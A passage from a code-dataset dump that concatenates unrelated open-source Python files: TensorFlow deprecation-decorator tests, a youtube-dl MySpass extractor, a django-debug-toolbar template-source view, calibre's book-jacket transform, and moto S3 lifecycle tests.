"\n" "\nReturns:" "\n Sum of args." % (date, instructions), getattr(_Object, "_fn").__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _Object()._fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_instance_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @deprecation.deprecated(date, instructions) def _fn(self, arg0, arg1): """fn doc.""" return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual( "fn doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), getattr(_Object, "_fn").__doc__) # Assert calling new fn issues log warning. 
self.assertEqual(3, _Object()._fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_instance_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @deprecation.deprecated(date, instructions) def _fn(self, arg0, arg1): return arg0 + arg1 # Assert function docs are properly updated. self.assertEqual( "DEPRECATED FUNCTION" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), getattr(_Object, "_fn").__doc__) # Assert calling new fn issues log warning. self.assertEqual(3, _Object()._fn(1, 2)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) def test_prop_wrong_order(self): with self.assertRaisesRegexp( ValueError, "make sure @property appears before @deprecated in your source code"): # pylint: disable=unused-variable class _Object(object): def __init(self): pass @deprecation.deprecated("2016-07-04", "Instructions.") @property def _prop(self): return "prop_wrong_order" @test.mock.patch.object(logging, "warning", autospec=True) def test_prop_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @property @deprecation.deprecated(date, instructions) def _prop(self): """prop doc. Returns: String. """ return "prop_with_doc" # Assert function docs are properly updated. self.assertEqual( "prop doc. (deprecated)" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" "\n" "\nReturns:" "\n String." % (date, instructions), getattr(_Object, "_prop").__doc__) # Assert calling new fn issues log warning. self.assertEqual("prop_with_doc", _Object()._prop) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_prop_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." class _Object(object): def __init(self): pass @property @deprecation.deprecated(date, instructions) def _prop(self): return "prop_no_doc" # Assert function docs are properly updated. self.assertEqual( "DEPRECATED FUNCTION" "\n" "\nTHIS FUNCTION IS DEPRECATED. It will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), getattr(_Object, "_prop").__doc__) # Assert calling new fn issues log warning. self.assertEqual("prop_no_doc", _Object()._prop) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) class DeprecatedArgsTest(test.TestCase): def _assert_subset(self, expected_subset, actual_set): self.assertTrue( actual_set.issuperset(expected_subset), msg="%s is not a superset of %s." 
% (actual_set, expected_subset)) def test_deprecated_illegal_args(self): instructions = "This is how you update..." date = "2016-07-04" with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_args("", instructions, "deprecated") with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_args("07-04-2016", instructions, "deprecated") with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_args(date, None, "deprecated") with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_args(date, "", "deprecated") with self.assertRaisesRegexp(ValueError, "argument"): deprecation.deprecated_args(date, instructions) def test_deprecated_missing_args(self): date = "2016-07-04" instructions = "This is how you update..." def _fn(arg0, arg1, deprecated=None): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert calls without the deprecated argument log nothing. with self.assertRaisesRegexp(ValueError, "not present.*\\['missing'\\]"): deprecation.deprecated_args(date, instructions, "missing")(_fn) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, deprecated=True): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. deprecated: Deprecated! Returns: Sum of args. """ return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n deprecated: Deprecated!" "\n" "\nReturns:" "\n Sum of args." % (date, instructions), _fn.__doc__) # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, deprecated=True): """fn doc.""" return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__) # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. 
self.assertEqual(3, _fn(1, 2, True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, deprecated=True): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "DEPRECATED FUNCTION ARGUMENTS" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), _fn.__doc__) # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_varargs(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, *deprecated): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, True, False)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_kwargs(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "deprecated") def _fn(arg0, arg1, **deprecated): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert calls without the deprecated argument log nothing. self.assertEqual(3, _fn(1, 2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated argument log a warning. self.assertEqual(3, _fn(1, 2, a=True, b=False)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_positional_and_named(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, "d1", "d2") def _fn(arg0, d1=None, arg1=2, d2=None): return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1 # Assert calls without the deprecated arguments log nothing. self.assertEqual(2, _fn(1, arg1=2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated arguments log warnings. 
self.assertEqual(2, _fn(1, None, 2, d2=False)) self.assertEqual(2, mock_warning.call_count) (args1, _) = mock_warning.call_args_list[0] self.assertRegexpMatches(args1[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d1"]), set(args1[1:])) (args2, _) = mock_warning.call_args_list[1] self.assertRegexpMatches(args2[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d2"]), set(args2[1:])) @test.mock.patch.object(logging, "warning", autospec=True) def test_positional_and_named_with_ok_vals(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_args(date, instructions, ("d1", None), ("d2", "my_ok_val")) def _fn(arg0, d1=None, arg1=2, d2=None): return arg0 + arg1 if d1 else arg1 + arg0 if d2 else arg0 * arg1 # Assert calls without the deprecated arguments log nothing. self.assertEqual(2, _fn(1, arg1=2)) self.assertEqual(0, mock_warning.call_count) # Assert calls with the deprecated arguments log warnings. self.assertEqual(2, _fn(1, False, 2, d2=False)) self.assertEqual(2, mock_warning.call_count) (args1, _) = mock_warning.call_args_list[0] self.assertRegexpMatches(args1[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d1"]), set(args1[1:])) (args2, _) = mock_warning.call_args_list[1] self.assertRegexpMatches(args2[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions, "d2"]), set(args2[1:])) # Assert calls with the deprecated arguments dont log warnings if # the value matches the 'ok_val'. mock_warning.reset_mock() self.assertEqual(3, _fn(1, None, 2, d2="my_ok_val")) self.assertEqual(0, mock_warning.call_count) class DeprecatedArgValuesTest(test.TestCase): def _assert_subset(self, expected_subset, actual_set): self.assertTrue( actual_set.issuperset(expected_subset), msg="%s is not a superset of %s." % (actual_set, expected_subset)) def test_deprecated_illegal_args(self): instructions = "This is how you update..." with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_arg_values("", instructions, deprecated=True) with self.assertRaisesRegexp(ValueError, "YYYY-MM-DD"): deprecation.deprecated_arg_values( "07-04-2016", instructions, deprecated=True) date = "2016-07-04" with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_arg_values(date, None, deprecated=True) with self.assertRaisesRegexp(ValueError, "instructions"): deprecation.deprecated_arg_values(date, "", deprecated=True) with self.assertRaisesRegexp(ValueError, "argument", deprecated=True): deprecation.deprecated_arg_values(date, instructions) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_arg_values(date, instructions, deprecated=True) def _fn(arg0, arg1, deprecated=True): """fn doc. Args: arg0: Arg 0. arg1: Arg 1. deprecated: Deprecated! Returns: Sum of args. """ return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" "\n" "\nArgs:" "\n arg0: Arg 0." "\n arg1: Arg 1." "\n deprecated: Deprecated!" "\n" "\nReturns:" "\n Sum of args." 
% (date, instructions), _fn.__doc__) # Assert calling new fn with non-deprecated value logs nothing. self.assertEqual(3, _fn(1, 2, deprecated=False)) self.assertEqual(0, mock_warning.call_count) # Assert calling new fn with deprecated value issues log warning. self.assertEqual(3, _fn(1, 2, deprecated=True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) # Assert calling new fn with default deprecated value issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(2, mock_warning.call_count) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_with_one_line_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_arg_values(date, instructions, deprecated=True) def _fn(arg0, arg1, deprecated=True): """fn doc.""" return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "fn doc. (deprecated arguments)" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn with non-deprecated value logs nothing. self.assertEqual(3, _fn(1, 2, deprecated=False)) self.assertEqual(0, mock_warning.call_count) # Assert calling new fn with deprecated value issues log warning. self.assertEqual(3, _fn(1, 2, deprecated=True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) # Assert calling new fn with default deprecated value issues log warning. self.assertEqual(3, _fn(1, 2)) self.assertEqual(2, mock_warning.call_count) @test.mock.patch.object(logging, "warning", autospec=True) def test_static_fn_no_doc(self, mock_warning): date = "2016-07-04" instructions = "This is how you update..." @deprecation.deprecated_arg_values(date, instructions, deprecated=True) def _fn(arg0, arg1, deprecated=True): return arg0 + arg1 if deprecated else arg1 + arg0 # Assert function docs are properly updated. self.assertEqual("_fn", _fn.__name__) self.assertEqual( "DEPRECATED FUNCTION ARGUMENTS" "\n" "\nSOME ARGUMENTS ARE DEPRECATED. They will be removed after %s." "\nInstructions for updating:" "\n%s" % (date, instructions), _fn.__doc__) # Assert calling new fn with non-deprecated value logs nothing. self.assertEqual(3, _fn(1, 2, deprecated=False)) self.assertEqual(0, mock_warning.call_count) # Assert calling new fn issues log warning. self.assertEqual(3, _fn(1, 2, deprecated=True)) self.assertEqual(1, mock_warning.call_count) (args, _) = mock_warning.call_args self.assertRegexpMatches(args[0], r"deprecated and will be removed") self._assert_subset(set(["after " + date, instructions]), set(args[1:])) # Assert calling new fn with default deprecated value issues log warning. 
self.assertEqual(3, _fn(1, 2)) self.assertEqual(2, mock_warning.call_count) class DeprecationArgumentsTest(test.TestCase): def testDeprecatedArgumentLookup(self): good_value = 3 self.assertEqual( deprecation.deprecated_argument_lookup("val_new", good_value, "val_old", None), good_value) self.assertEqual( deprecation.deprecated_argument_lookup("val_new", None, "val_old", good_value), good_value) with self.assertRaisesRegexp(ValueError, "Cannot specify both 'val_old' and 'val_new'"): self.assertEqual( deprecation.deprecated_argument_lookup("val_new", good_value, "val_old", good_value), good_value) def testRewriteArgumentDocstring(self): docs = """Add `a` and `b` Args: a: first arg b: second arg """ new_docs = deprecation.rewrite_argument_docstring( deprecation.rewrite_argument_docstring(docs, "a", "left"), "b", "right") new_docs_ref = """Add `left` and `right` Args: left: first arg right: second arg """ self.assertEqual(new_docs, new_docs_ref) if __name__ == "__main__": test.main()
mit
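A short sketch of the decorator pattern those tests exercise, assuming the same deprecation module import path used above; the function names, date, and messages below are illustrative only.

from tensorflow.python.util import deprecation

@deprecation.deprecated("2016-07-04", "Use the replacement API instead.")
def add(arg0, arg1):
    """Adds two numbers."""
    return arg0 + arg1

@deprecation.deprecated_args("2016-07-04", "Stop passing `deprecated`.", "deprecated")
def add_flagged(arg0, arg1, deprecated=True):
    return arg0 + arg1

add(1, 2)                # logs one deprecation warning, returns 3
add_flagged(1, 2)        # no warning: the deprecated argument was not passed
add_flagged(1, 2, True)  # warns that `deprecated` is deprecated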
kaltsimon/youtube-dl
youtube_dl/extractor/myspass.py
105
2721
from __future__ import unicode_literals import os.path from .common import InfoExtractor from ..compat import ( compat_urllib_parse_urlparse, ) from ..utils import ( ExtractorError, ) class MySpassIE(InfoExtractor): _VALID_URL = r'http://www\.myspass\.de/.*' _TEST = { 'url': 'http://www.myspass.de/myspass/shows/tvshows/absolute-mehrheit/Absolute-Mehrheit-vom-17022013-Die-Highlights-Teil-2--/11741/', 'md5': '0b49f4844a068f8b33f4b7c88405862b', 'info_dict': { 'id': '11741', 'ext': 'mp4', "description": "Wer kann in die Fu\u00dfstapfen von Wolfgang Kubicki treten und die Mehrheit der Zuschauer hinter sich versammeln? Wird vielleicht sogar die Absolute Mehrheit geknackt und der Jackpot von 200.000 Euro mit nach Hause genommen?", "title": "Absolute Mehrheit vom 17.02.2013 - Die Highlights, Teil 2", }, } def _real_extract(self, url): META_DATA_URL_TEMPLATE = 'http://www.myspass.de/myspass/includes/apps/video/getvideometadataxml.php?id=%s' # video id is the last path element of the URL # usually there is a trailing slash, so also try the second but last url_path = compat_urllib_parse_urlparse(url).path url_parent_path, video_id = os.path.split(url_path) if not video_id: _, video_id = os.path.split(url_parent_path) # get metadata metadata_url = META_DATA_URL_TEMPLATE % video_id metadata = self._download_xml( metadata_url, video_id, transform_source=lambda s: s.strip()) # extract values from metadata url_flv_el = metadata.find('url_flv') if url_flv_el is None: raise ExtractorError('Unable to extract download url') video_url = url_flv_el.text title_el = metadata.find('title') if title_el is None: raise ExtractorError('Unable to extract title') title = title_el.text format_id_el = metadata.find('format_id') if format_id_el is None: format = 'mp4' else: format = format_id_el.text description_el = metadata.find('description') if description_el is not None: description = description_el.text else: description = None imagePreview_el = metadata.find('imagePreview') if imagePreview_el is not None: thumbnail = imagePreview_el.text else: thumbnail = None return { 'id': video_id, 'url': video_url, 'title': title, 'format': format, 'thumbnail': thumbnail, 'description': description, }
unlicense
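A hypothetical way to exercise this extractor through youtube-dl's public API; the options dict and printed fields are illustrative, while the URL is taken from the _TEST entry above.

import youtube_dl

ydl = youtube_dl.YoutubeDL({"quiet": True})
info = ydl.extract_info(
    "http://www.myspass.de/myspass/shows/tvshows/absolute-mehrheit/"
    "Absolute-Mehrheit-vom-17022013-Die-Highlights-Teil-2--/11741/",
    download=False)  # metadata only, no file download
print(info["id"], info["title"])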
klenks/jobsportal
venv/lib/python2.7/site-packages/debug_toolbar/panels/templates/views.py
3
2341
from __future__ import absolute_import, unicode_literals from django.http import HttpResponseBadRequest from django.shortcuts import render_to_response from django.template import TemplateDoesNotExist from django.template.engine import Engine from django.utils.safestring import mark_safe try: from django.template import Origin except ImportError: Origin = None def template_source(request): """ Return the source of a template, syntax-highlighted by Pygments if it's available. """ template_origin_name = request.GET.get('template_origin', None) if template_origin_name is None: return HttpResponseBadRequest('"template_origin" key is required') template_name = request.GET.get('template', template_origin_name) final_loaders = [] loaders = Engine.get_default().template_loaders for loader in loaders: if loader is not None: # When the loader has loaders associated with it, # append those loaders to the list. This occurs with # django.template.loaders.cached.Loader if hasattr(loader, 'loaders'): final_loaders += loader.loaders else: final_loaders.append(loader) for loader in final_loaders: if Origin: # django>=1.9 origin = Origin(template_origin_name) try: source = loader.get_contents(origin) break except TemplateDoesNotExist: pass else: # django<1.9 try: source, _ = loader.load_template_source(template_name) break except TemplateDoesNotExist: pass else: source = "Template Does Not Exist: %s" % (template_origin_name,) try: from pygments import highlight from pygments.lexers import HtmlDjangoLexer from pygments.formatters import HtmlFormatter source = highlight(source, HtmlDjangoLexer(), HtmlFormatter()) source = mark_safe(source) source.pygmentized = True except ImportError: pass # Using render_to_response avoids running global context processors. return render_to_response('debug_toolbar/panels/template_source.html', { 'source': source, 'template_name': template_name })
mit
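The Pygments branch in the view above boils down to three calls; a standalone sketch (assuming Pygments is installed) of what source ends up holding for a small Django template string.

from pygments import highlight
from pygments.lexers import HtmlDjangoLexer
from pygments.formatters import HtmlFormatter

template_source = "{% if user %}Hello, {{ user.name }}!{% endif %}"
html = highlight(template_source, HtmlDjangoLexer(), HtmlFormatter())
print(html)  # syntax-highlighted markup wrapped in a <div class="highlight"> block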
Eksmo/calibre
src/calibre/ebooks/oeb/transforms/jacket.py
1
8466
#!/usr/bin/env python # vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai from __future__ import with_statement __license__ = 'GPL v3' __copyright__ = '2009, Kovid Goyal <[email protected]>' __docformat__ = 'restructuredtext en' import sys from xml.sax.saxutils import escape from lxml import etree from calibre import guess_type, strftime from calibre.ebooks.BeautifulSoup import BeautifulSoup from calibre.ebooks.oeb.base import XPath, XHTML_NS, XHTML, xml2text, urldefrag from calibre.library.comments import comments_to_html from calibre.utils.date import is_date_undefined from calibre.ebooks.chardet import strip_encoding_declarations JACKET_XPATH = '//h:meta[@name="calibre-content" and @content="jacket"]' class Jacket(object): ''' Book jacket manipulation. Remove first image and insert comments at start of book. ''' def remove_images(self, item, limit=1): path = XPath('//h:img[@src]') removed = 0 for img in path(item.data): if removed >= limit: break href = item.abshref(img.get('src')) image = self.oeb.manifest.hrefs.get(href, None) if image is not None: self.oeb.manifest.remove(image) img.getparent().remove(img) removed += 1 return removed def remove_first_image(self): deleted_item = None for item in self.oeb.spine: removed = self.remove_images(item) if removed > 0: self.log('Removed first image') body = XPath('//h:body')(item.data) if body: raw = xml2text(body[0]).strip() imgs = XPath('//h:img|//svg:svg')(item.data) if not raw and not imgs: self.log('Removing %s as it has no content'%item.href) self.oeb.manifest.remove(item) deleted_item = item break if deleted_item is not None: for item in list(self.oeb.toc): href = urldefrag(item.href)[0] if href == deleted_item.href: self.oeb.toc.remove(item) def insert_metadata(self, mi): self.log('Inserting metadata into book...') try: tags = map(unicode, self.oeb.metadata.subject) except: tags = [] try: comments = unicode(self.oeb.metadata.description[0]) except: comments = '' try: title = unicode(self.oeb.metadata.title[0]) except: title = _('Unknown') root = render_jacket(mi, self.opts.output_profile, alt_title=title, alt_tags=tags, alt_comments=comments) id, href = self.oeb.manifest.generate('calibre_jacket', 'jacket.xhtml') item = self.oeb.manifest.add(id, href, guess_type(href)[0], data=root) self.oeb.spine.insert(0, item, True) self.oeb.inserted_metadata_jacket = item def remove_existing_jacket(self): for x in self.oeb.spine[:4]: if XPath(JACKET_XPATH)(x.data): self.remove_images(x, limit=sys.maxint) self.oeb.manifest.remove(x) self.log('Removed existing jacket') break def __call__(self, oeb, opts, metadata): ''' Add metadata in jacket.xhtml if specified in opts If not specified, remove previous jacket instance ''' self.oeb, self.opts, self.log = oeb, opts, oeb.log self.remove_existing_jacket() if opts.remove_first_image: self.remove_first_image() if opts.insert_metadata: self.insert_metadata(metadata) # Render Jacket {{{ def get_rating(rating, rchar, e_rchar): ans = '' try: num = float(rating)/2 except: return ans num = max(0, num) num = min(num, 5) if num < 1: return ans ans = ("%s%s") % (rchar * int(num), e_rchar * (5 - int(num))) return ans def render_jacket(mi, output_profile, alt_title=_('Unknown'), alt_tags=[], alt_comments='', alt_publisher=('')): css = P('jacket/stylesheet.css', data=True).decode('utf-8') try: title_str = mi.title if mi.title else alt_title except: title_str = _('Unknown') title = '<span class="title">%s</span>' % (escape(title_str)) series = escape(mi.series if mi.series else '') if mi.series and mi.series_index is 
not None: series += escape(' [%s]'%mi.format_series_index()) if not mi.series: series = '' try: publisher = mi.publisher if mi.publisher else alt_publisher except: publisher = '' try: if is_date_undefined(mi.pubdate): pubdate = '' else: pubdate = strftime(u'%Y', mi.pubdate.timetuple()) except: pubdate = '' rating = get_rating(mi.rating, output_profile.ratings_char, output_profile.empty_ratings_char) tags = mi.tags if mi.tags else alt_tags if tags: tags = output_profile.tags_to_string(tags) else: tags = '' comments = mi.comments if mi.comments else alt_comments comments = comments.strip() orig_comments = comments if comments: comments = comments_to_html(comments) try: author = mi.format_authors() except: author = '' def generate_html(comments): args = dict(xmlns=XHTML_NS, title_str=title_str, css=css, title=title, author=author, publisher=publisher, pubdate_label=_('Published'), pubdate=pubdate, series_label=_('Series'), series=series, rating_label=_('Rating'), rating=rating, tags_label=_('Tags'), tags=tags, comments=comments, footer='' ) for key in mi.custom_field_keys(): try: display_name, val = mi.format_field_extended(key)[:2] key = key.replace('#', '_') args[key] = escape(val) args[key+'_label'] = escape(display_name) except: pass # Used in the comment describing use of custom columns in templates args['_genre_label'] = args.get('_genre_label', '{_genre_label}') args['_genre'] = args.get('_genre', '{_genre}') generated_html = P('jacket/template.xhtml', data=True).decode('utf-8').format(**args) # Post-process the generated html to strip out empty header items soup = BeautifulSoup(generated_html) if not series: series_tag = soup.find(attrs={'class':'cbj_series'}) if series_tag is not None: series_tag.extract() if not rating: rating_tag = soup.find(attrs={'class':'cbj_rating'}) if rating_tag is not None: rating_tag.extract() if not tags: tags_tag = soup.find(attrs={'class':'cbj_tags'}) if tags_tag is not None: tags_tag.extract() if not pubdate: pubdate_tag = soup.find(attrs={'class':'cbj_pubdata'}) if pubdate_tag is not None: pubdate_tag.extract() if output_profile.short_name != 'kindle': hr_tag = soup.find('hr', attrs={'class':'cbj_kindle_banner_hr'}) if hr_tag is not None: hr_tag.extract() return strip_encoding_declarations( soup.renderContents('utf-8').decode('utf-8')) from calibre.ebooks.oeb.base import RECOVER_PARSER try: root = etree.fromstring(generate_html(comments), parser=RECOVER_PARSER) except: try: root = etree.fromstring(generate_html(escape(orig_comments)), parser=RECOVER_PARSER) except: root = etree.fromstring(generate_html(''), parser=RECOVER_PARSER) return root # }}} def linearize_jacket(oeb): for x in oeb.spine[:4]: if XPath(JACKET_XPATH)(x.data): for e in XPath('//h:table|//h:tr|//h:th')(x.data): e.tag = XHTML('div') for e in XPath('//h:td')(x.data): e.tag = XHTML('span') break
gpl-3.0
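A small illustration of the clamping in get_rating above; the import path mirrors the file's location in the calibre tree (requires calibre on the path), and the expected outputs were worked out from the function's own logic.

from calibre.ebooks.oeb.transforms.jacket import get_rating

print(get_rating(7, '*', '.'))   # '***..'  (7/2 = 3.5 stars, truncated to 3)
print(get_rating(12, '*', '.'))  # '*****'  (clamped to the 5-star maximum)
print(get_rating(1, '*', '.'))   # ''       (below one star yields an empty string)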
araines/moto
tests/test_s3/test_s3_lifecycle.py
18
3339
from __future__ import unicode_literals import boto from boto.exception import S3ResponseError from boto.s3.lifecycle import Lifecycle, Transition, Expiration, Rule import sure # noqa from moto import mock_s3 @mock_s3 def test_lifecycle_create(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") lifecycle = Lifecycle() lifecycle.add_rule('myid', '', 'Enabled', 30) bucket.configure_lifecycle(lifecycle) response = bucket.get_lifecycle_config() len(response).should.equal(1) lifecycle = response[0] lifecycle.id.should.equal('myid') lifecycle.prefix.should.equal('') lifecycle.status.should.equal('Enabled') lifecycle.transition.should.equal(None) @mock_s3 def test_lifecycle_with_glacier_transition(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") lifecycle = Lifecycle() transition = Transition(days=30, storage_class='GLACIER') rule = Rule('myid', prefix='', status='Enabled', expiration=None, transition=transition) lifecycle.append(rule) bucket.configure_lifecycle(lifecycle) response = bucket.get_lifecycle_config() transition = response[0].transition transition.days.should.equal(30) transition.storage_class.should.equal('GLACIER') transition.date.should.equal(None) @mock_s3 def test_lifecycle_multi(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") date = '2022-10-12T00:00:00.000Z' sc = 'GLACIER' lifecycle = Lifecycle() lifecycle.add_rule("1", "1/", "Enabled", 1) lifecycle.add_rule("2", "2/", "Enabled", Expiration(days=2)) lifecycle.add_rule("3", "3/", "Enabled", Expiration(date=date)) lifecycle.add_rule("4", "4/", "Enabled", None, Transition(days=4, storage_class=sc)) lifecycle.add_rule("5", "5/", "Enabled", None, Transition(date=date, storage_class=sc)) bucket.configure_lifecycle(lifecycle) # read the lifecycle back rules = bucket.get_lifecycle_config() for rule in rules: if rule.id == "1": rule.prefix.should.equal("1/") rule.expiration.days.should.equal(1) elif rule.id == "2": rule.prefix.should.equal("2/") rule.expiration.days.should.equal(2) elif rule.id == "3": rule.prefix.should.equal("3/") rule.expiration.date.should.equal(date) elif rule.id == "4": rule.prefix.should.equal("4/") rule.transition.days.should.equal(4) rule.transition.storage_class.should.equal(sc) elif rule.id == "5": rule.prefix.should.equal("5/") rule.transition.date.should.equal(date) rule.transition.storage_class.should.equal(sc) else: assert False, "Invalid rule id" @mock_s3 def test_lifecycle_delete(): conn = boto.s3.connect_to_region("us-west-1") bucket = conn.create_bucket("foobar") lifecycle = Lifecycle() lifecycle.add_rule(expiration=30) bucket.configure_lifecycle(lifecycle) response = bucket.get_lifecycle_config() response.should.have.length_of(1) bucket.delete_lifecycle_configuration() bucket.get_lifecycle_config.when.called_with().should.throw(S3ResponseError)
apache-2.0
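A condensed sketch of the moto pattern those tests rely on: decorating a function with @mock_s3 keeps the boto S3 calls in-process, so no real bucket is touched (the bucket and prefix names here are made up).

import boto
from boto.s3.lifecycle import Lifecycle
from moto import mock_s3

@mock_s3
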